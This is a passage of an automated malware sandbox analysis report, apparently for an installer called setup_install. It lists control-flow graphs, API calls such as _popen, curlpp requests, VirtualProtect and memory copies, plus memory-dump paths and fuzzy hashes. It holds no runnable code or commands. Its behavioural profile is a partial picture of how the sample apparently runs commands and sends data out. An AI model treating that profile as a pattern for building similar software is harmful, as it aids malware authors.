486680 call 486620 196->214 197->196 230 402028-402090 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 213->230 231 401fda-402023 call 494fb0 call 486680 call 486620 213->231 214->213 247 4020e0-402148 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 230->247 248 402092-4020db call 494fb0 call 486680 call 486620 230->248 231->230 264 402198-402200 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 247->264 265 40214a-402193 call 494fb0 call 486680 call 486620 247->265 248->247 281 402250-4022b8 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 264->281 282 402202-40224b call 494fb0 call 486680 call 486620 264->282 265->264 298 402308-402370 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 281->298 299 4022ba-402303 call 494fb0 call 486680 call 486620 281->299 282->281 315 4023c0-402421 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 298->315 316 402372-4023bb call 494fb0 call 486680 call 486620 298->316 299->298 331 402426-402428 315->331 316->315 332 402478-40252b call 48ccc0 call 494ff8 call 494de0 call 494e14 call 486620 * 3 _ZN6curlpp7CleanupC1Ev 331->332 333 40242a-402473 call 494fb0 call 486680 call 486620 331->333 353 40252d-40254d call 41d634 _ZN6curlpp4Easy7performEv 332->353 354 40254f-40258c call 494fb0 call 41d634 call 486620 _ZN6curlpp4Easy7performEv 332->354 333->332 359 402591-402c62 _ZN6curlpp7CleanupD1Ev call 486620 * 24 353->359 354->359
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _popen$CleanupEasy7performN6curlpp4N6curlpp7$FindSleepWindowgetenvstrlen
                                        • String ID: d!J$l"J
                                        • API String ID: 2089126685-1660994928
                                        • Opcode ID: 1f845ef25b6485fed4c4845b3a23ef83b2d64344ac0362beeb03cee787b1a368
                                        • Instruction ID: a1c288b360c48479ebdc30672b196576d81706e97189c13799ef98729f4e13f7
                                        • Opcode Fuzzy Hash: 1f845ef25b6485fed4c4845b3a23ef83b2d64344ac0362beeb03cee787b1a368
                                        • Instruction Fuzzy Hash: AB920A70A042198BCF54FF75C99559DB7F9AF84308F4088BE9889E7341FB389A888F55

                                        Control-flow Graph
                                        control_flow_graph 478 64948030-64948099 call 64949480 call 649494c0 abort 484 64948280-64948282 478->484 485 6494809f-649480a5 478->485 486 649480a7-649480ac 485->486 487 649480bc-649480c4 486->487 488 649480ae-649480b6 486->488 487->486 490 649480c6-649480d2 call 64948ac0 487->490 488->487 489 64948190-6494819a 488->489 492 64948149-6494815f VirtualQuery 489->492 497 649482a7-649482b2 call 64948030 490->497 498 649480d8-6494812f call 64948b90 VirtualQuery 490->498 494 64948165-6494816c 492->494 495 649482b7-649482d7 call 64948030 492->495 499 649481a0-649481a3 494->499 500 6494816e-64948181 memcpy 494->500 510 649482e0-6494832f call 64948b00 call 649493f0 495->510 511 649482d9 495->511 497->495 512 64948135-6494813c 498->512 513 64948287-6494829e 498->513 499->500 501 649481a5-649481ee VirtualProtect memcpy 499->501 505 64948186-6494818d 500->505 501->505 506 649481f0-649481f3 501->506 506->505 509 649481f5-6494821c VirtualProtect 506->509 525 64948335-64948338 510->525 526 649483d1-649483d8 510->526 516 64948220-64948223 512->516 517 64948142 512->517 513->497 514 649482a2 call 64948030 513->514 514->497 516->517 518 64948229-6494825f VirtualProtect 516->518 517->492 518->517 520 64948265-6494827c GetLastError call 64948030 518->520 520->484 527 64948490 525->527 528 6494833e-64948345 525->528 531 64948495-64948499 527->531 529 649483d9 528->529 530 6494834b-64948352 528->530 533 649483de-649483e4 529->533 530->529 532 64948358-64948365 530->532 531->533 534 6494849f-649484a4 531->534 532->531 535 6494836b 532->535 533->526 538 649483e6-64948410 call 64948080 533->538 536 64948370-64948376 534->536 537 649484aa 534->537 535->536 539 64948567-64948589 call 64948030 536->539 540 6494837c-64948385 536->540 537->533 545 64948412-64948420 538->545 553 649485aa 539->553 554 6494858b-6494858e 539->554 540->526 543 64948387-649483a2 540->543 546 649484af-649484df call 64948080 543->546 547 649483a8-649483ab 543->547 549 64948432-6494843d 545->549 550 64948422 545->550 562 649484e4-649484ed 546->562 551 64948525-64948542 call 64948080 547->551 552 649483b1-649483b4 547->552 557 64948424-64948430 549->557 558 6494843f-6494845c VirtualQuery 549->558 550->526 551->562 559 649484f8-64948523 call 64948080 552->559 560 649483ba-649483cc call 64948030 552->560 561 64948590-649485a5 554->561 557->526 557->549 565 64948544-64948562 call 64948030 558->565 566 64948462-6494848b VirtualProtect 558->566 559->562 560->526 572 649485a7 561->572 562->543 568 649484f3 562->568 565->539 566->557 568->545 572->553
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: QueryVirtual$abortmemcpy
                                        • String ID: @
                                        • API String ID: 2310791685-2766056989
                                        • Opcode ID: 2b7ae2df33974dd628e5248e86a322eb566449117a4461b63372651e02c79e06
                                        • Instruction ID: cd0b61dda2b7f99161b0901d061b19306d01c471fd7a760bb0aa525755706968
                                        • Opcode Fuzzy Hash: 2b7ae2df33974dd628e5248e86a322eb566449117a4461b63372651e02c79e06
                                        • Instruction Fuzzy Hash: 7071D7B498D3019FD748EF28D584A5ABBE4FF99784F51891DE888D7310E330E854CB92

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Current$Thread$ProcessValue$CreateDuplicateEventHandlePriorityabortfprintf
                                        • String ID:
                                        • API String ID: 3031014995-0
                                        • Opcode ID: 2e29305413a5518f4786ab4109353ff4159da3f3b6ba7ff97fe943597510cba7
                                        • Instruction ID: f65fdf35157a8e0690699ea63534f5b7c5066402f19757c57a2f514cfb37a261
                                        • Opcode Fuzzy Hash: 2e29305413a5518f4786ab4109353ff4159da3f3b6ba7ff97fe943597510cba7
                                        • Instruction Fuzzy Hash: E041F2B09487118FEB20AFA9C64875ABFF4FB59314F104A1DE8A597340E775E5088FA2

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 706 41d2c0-41d2d7 pthread_mutex_lock 707 41d3ea-497b56 call 41f220 706->707 708 41d2dd-41d2e8 706->708 720 497b58 call 496d80 707->720 721 497b5d-497b6a call 40fe40 707->721 709 41d350-41d353 708->709 710 41d2ea-41d2f6 708->710 712 41d359-41d367 pthread_mutex_unlock 709->712 710->709 713 41d2f8-41d2fb 710->713 716 41d3c0-41d3e5 call 496bf0 call 4972e0 712->716 717 41d369-41d370 712->717 718 41d301-41d303 713->718 719 41d390-41d3a2 713->719 716->707 722 41d3a4-41d3ad 718->722 723 41d309-41d30b 718->723 719->712 720->721 741 497b6c call 496d80 721->741 742 497b71-497bb4 call 40fe40 pthread_mutex_init malloc 721->742 727 41d324-41d326 722->727 728 41d31a-41d322 723->728 729 41d30d-41d3bb 723->729 735 41d380-41d38c 727->735 736 41d328-41d332 727->736 728->727 734 41d312-41d316 728->734 729->727 734->727 740 41d318 734->740 735->736 737 41d371-41d377 736->737 738 41d334-41d347 736->738 737->712 738->712 740->728 741->742 746 497bd8-497bec 742->746 747 497bb6-497bc1 742->747 748 497bc8-497bd7 call 4014c0 746->748 747->748
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0041D2D0
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041D360
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497B92
                                        • malloc.MSVCRT ref: 00497BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: mallocpthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 1674753379-129645102
                                        • Opcode ID: 20aa177bee8d51443119d847946777f32a96d19e2bef0a295f5a2dfdf495ba8c
                                        • Instruction ID: 26b813f0526bfceca514e7c9a0f061a522b97b39d855c3efe8bb90c56aa2f88c
                                        • Opcode Fuzzy Hash: 20aa177bee8d51443119d847946777f32a96d19e2bef0a295f5a2dfdf495ba8c
                                        • Instruction Fuzzy Hash: 45415BB1A042068FCB10EF25D48466EBBE0BF96348F15856FD8588B311E7789886CB5E

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 751 41d400-41d416 pthread_mutex_lock 752 41d4cb-497b6a call 41f220 751->752 753 41d41c-41d438 751->753 767 497b6c call 496d80 752->767 768 497b71-497bb4 call 40fe40 pthread_mutex_init malloc 752->768 754 41d451 753->754 755 41d43a-41d43e 753->755 760 41d453-41d461 pthread_mutex_unlock 754->760 757 41d440-41d49f 755->757 758 41d44a-41d44f 755->758 766 41d473-41d47d 757->766 758->754 765 41d442-41d446 758->765 763 41d4a1-41d4c6 call 496bf0 call 4972e0 760->763 764 41d463-41d46b 760->764 763->752 770 41d470 765->770 771 41d448 765->771 772 41d492-41d496 766->772 773 41d47f-41d48b 766->773 767->768 780 497bd8-497bec 768->780 781 497bb6-497bc1 768->781 770->766 771->758 777 41d48d-41d490 772->777 773->777 777->760 782 497bc8-497bd7 call 4014c0 780->782 781->782
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1(?,?,?,00496C39,?,?,?,?,?,004920D4,?,?,?,00485CB8), ref: 0041D40F
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1(?,?,?,00496C39,?,?,?,?,?,004920D4,?,?,?,00485CB8), ref: 0041D45A
                                          • Part of subcall function 00496BF0: malloc.MSVCRT ref: 00496BFE
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497B92
                                        • malloc.MSVCRT ref: 00497BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 661434298-129645102
                                        • Opcode ID: c3dba70a0ea669742c4d5cd8d5b3471d3b5df1c87b6ad7bcb0a79c6616cc1072
                                        • Instruction ID: 2cab2a2604251acd9e1c26d9c5fd11c1da8bb51725402f01afc28a56640a7ecb
                                        • Opcode Fuzzy Hash: c3dba70a0ea669742c4d5cd8d5b3471d3b5df1c87b6ad7bcb0a79c6616cc1072
                                        • Instruction Fuzzy Hash: DB31B0F1A48301CFD700AF69D48436ABFE0BB46348F5585BED5888B351E37C98858B5E

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 785 401299 786 4012a0-4012a3 785->786 787 4012a5-4012ad 786->787 788 4012af-4012bc 786->788 787->786 787->788 790 4012d2-4012f2 malloc 788->790 791 4012be-4012c7 788->791 794 401464 790->794 795 4012f8-401309 790->795 792 4013c0-4013c4 791->792 793 4012cd 791->793 792->793 793->790 797 40146c-401492 exit call 40ca60 794->797 796 401310-401344 strlen malloc memcpy 795->796 796->796 798 401346-401398 call 40ca20 call 40165f 796->798 798->797 805 40139e-4013a6 798->805 806 4013b2-4013bd 805->806 807 4013a8-4013ad _cexit 805->807 807->806
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$_cexitmemcpystrlen
                                        • String ID:
                                        • API String ID: 701060287-0
                                        • Opcode ID: 06c8ec97fb9d0d8078208a5fed52b2eb6e75a7703e5f9957ea4541548415c957
                                        • Instruction ID: 6ff02f7f8e87337fbd71bedcca9d93ca2c1ed4cb2c18e8dc790010e9ad0b078e
                                        • Opcode Fuzzy Hash: 06c8ec97fb9d0d8078208a5fed52b2eb6e75a7703e5f9957ea4541548415c957
                                        • Instruction Fuzzy Hash: D3314A75A043458FDB10DF65D8C0689BBE1FB48324F14497EE948AB362D338A945CF89

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 808 401289-401292 810 401294 808->810 811 4012a5-4012ad 808->811 812 4012af-4012bc 810->812 811->812 813 4012a0-4012a3 811->813 815 4012d2-4012f2 malloc 812->815 816 4012be-4012c7 812->816 813->811 813->812 819 401464 815->819 820 4012f8-401309 815->820 817 4013c0-4013c4 816->817 818 4012cd 816->818 817->818 818->815 822 40146c-401492 exit call 40ca60 819->822 821 401310-401344 strlen malloc memcpy 820->821 821->821 823 401346-401398 call 40ca20 call 40165f 821->823 823->822 830 40139e-4013a6 823->830 831 4013b2-4013bd 830->831 832 4013a8-4013ad _cexit 830->832 832->831
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$_cexitmemcpystrlen
                                        • String ID:
                                        • API String ID: 701060287-0
                                        • Opcode ID: 98227b34ad0e73591ab3d3ee3b07df4cb8bdbde6b198b8821096eb9a0d18b09b
                                        • Instruction ID: 85f0b89e7ca14864cc7aa2894bce5cab4f8fce2c0c93d9062040cfe6b8931e53
                                        • Opcode Fuzzy Hash: 98227b34ad0e73591ab3d3ee3b07df4cb8bdbde6b198b8821096eb9a0d18b09b
                                        • Instruction Fuzzy Hash: 10312875A04345CFDB10DF65E8C0689B7E1FB48324F10497ED948AB362D738A945CF89

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 853 6494819c-649481a3 855 649481a5-649481ee VirtualProtect memcpy 853->855 856 6494816e-64948181 memcpy 853->856 857 64948186-6494818d 855->857 858 649481f0-649481f3 855->858 856->857 858->857 859 649481f5-6494821c VirtualProtect 858->859
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ProtectVirtualmemcpy
                                        • String ID: @
                                        • API String ID: 4237922067-2766056989
                                        • Opcode ID: 005670ff57fd0ea0de7af9dadabae8a65afb39ae1ea474bce625394c7c217153
                                        • Instruction ID: a0df801b09c76da6139558fa236fcd1a2ba4dbaa73ebbe9f80ef25fb42541813
                                        • Opcode Fuzzy Hash: 005670ff57fd0ea0de7af9dadabae8a65afb39ae1ea474bce625394c7c217153
                                        • Instruction Fuzzy Hash: 6B016CB8948345AFD740EF29D58491EBBE0FB88654F508D1EF9D9D7310E234E9448F82

                                        Control-flow Graph (node ranges and edges; executed/not-executed colouring not recoverable from text)
                                        control_flow_graph 860 649482d0-649482d7 861 649482e0-6494832f call 64948b00 call 649493f0 860->861 862 649482d9 860->862 867 64948335-64948338 861->867 868 649483d1-649483d8 861->868 869 64948490 867->869 870 6494833e-64948345 867->870 873 64948495-64948499 869->873 871 649483d9 870->871 872 6494834b-64948352 870->872 875 649483de-649483e4 871->875 872->871 874 64948358-64948365 872->874 873->875 876 6494849f-649484a4 873->876 874->873 877 6494836b 874->877 875->868 880 649483e6-64948410 call 64948080 875->880 878 64948370-64948376 876->878 879 649484aa 876->879 877->878 881 64948567-64948589 call 64948030 878->881 882 6494837c-64948385 878->882 879->875 887 64948412-64948420 880->887 895 649485aa 881->895 896 6494858b-6494858e 881->896 882->868 885 64948387-649483a2 882->885 888 649484af-649484df call 64948080 885->888 889 649483a8-649483ab 885->889 891 64948432-6494843d 887->891 892 64948422 887->892 904 649484e4-649484ed 888->904 893 64948525-64948542 call 64948080 889->893 894 649483b1-649483b4 889->894 899 64948424-64948430 891->899 900 6494843f-6494845c VirtualQuery 891->900 892->868 893->904 901 649484f8-64948523 call 64948080 894->901 902 649483ba-649483cc call 64948030 894->902 903 64948590-649485a5 896->903 899->868 899->891 907 64948544-64948562 call 64948030 900->907 908 64948462-6494848b VirtualProtect 900->908 901->904 902->868 914 649485a7 903->914 904->885 910 649484f3 904->910 907->881 908->899 910->887 914->895
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 026430364d2c39662762d43eb1a4cb56f5ee8768c86e71a3b37dc47ac7a14f31
                                        • Instruction ID: f6a7e6d62b82ecbf613358e8ede63a0627467d7bc80a3cde144e7469d124f201
                                        • Opcode Fuzzy Hash: 026430364d2c39662762d43eb1a4cb56f5ee8768c86e71a3b37dc47ac7a14f31
                                        • Instruction Fuzzy Hash: 5571BB79A883108FDB08EF69E48479EBBF9FB56308F15856AE8459B314D730D840CBD2
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • free.MSVCRT(?,?,00000000,00000004,64944DDE,?,?,?,?,64944E33), ref: 649448DF
                                        • fprintf.MSVCRT ref: 64944903
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$fprintffree
                                        • String ID:
                                        • API String ID: 4177453990-0
                                        • Opcode ID: 0f8f680cf1670c4b601ce226f6ef937a1a0ea7d3586276972f230eef0ff64193
                                        • Instruction ID: 4f7707face29f2bd5570212fbb51944289be26cc5e92d5fc9c7fb70f29a74edc
                                        • Opcode Fuzzy Hash: 0f8f680cf1670c4b601ce226f6ef937a1a0ea7d3586276972f230eef0ff64193
                                        • Instruction Fuzzy Hash: 6E11E1B1AC8381CFE714AF68D0C1216BBEABFA2328F15852DC99497304E730D8448F93
                                        APIs
                                        • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE,?,?,?), ref: 64942FC6
                                        • free.MSVCRT(?,?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE), ref: 64942FE9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
